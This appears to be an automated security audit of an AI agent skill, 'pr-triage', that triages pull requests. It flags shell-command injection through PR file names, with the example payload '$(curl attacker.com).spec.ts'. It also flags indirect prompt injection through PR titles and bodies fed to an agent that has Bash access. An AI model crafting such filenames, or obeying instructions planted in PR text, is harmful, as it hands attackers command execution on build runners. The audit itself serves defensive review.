skills/toss/es-toolkit/pr-triage/Gen Agent Trust Hub

pr-triage

Warn

Audited by Gen Agent Trust Hub on Apr 7, 2026

Risk Level: MEDIUM
Findings: COMMAND_EXECUTION, PROMPT_INJECTION
Full Analysis
  • [COMMAND_EXECUTION]: The skill dynamically constructs shell commands, such as yarn vitest run src/{category}/{fn}.spec.ts, using file paths retrieved from external Pull Requests. An attacker could craft a PR with filenames containing shell metacharacters (e.g., $(curl attacker.com).spec.ts) to execute arbitrary commands on the runner when the agent attempts to execute tests for those files.
  • [PROMPT_INJECTION]: The skill is vulnerable to indirect prompt injection. It retrieves untrusted data from a PR's title and body via the GitHub CLI and provides this to the agent for classification and summarization. The agent has access to high-privilege tools like Bash, and the workflow lacks boundary markers to prevent the agent from obeying instructions embedded in the PR text.
  • Ingestion points: Untrusted data is ingested from the GitHub API using gh pr view (title and body fields) in SKILL.md.
  • Boundary markers: No delimiters or instructions to ignore embedded commands are present in the prompt templates.
  • Capability inventory: The agent has access to the Bash tool and can run arbitrary code.
  • Sanitization: No sanitization is performed on external PR data or filenames before they are processed by the agent or used in shell commands.
Audit Metadata
Risk Level: MEDIUM
Analyzed: Apr 7, 2026, 06:20 AM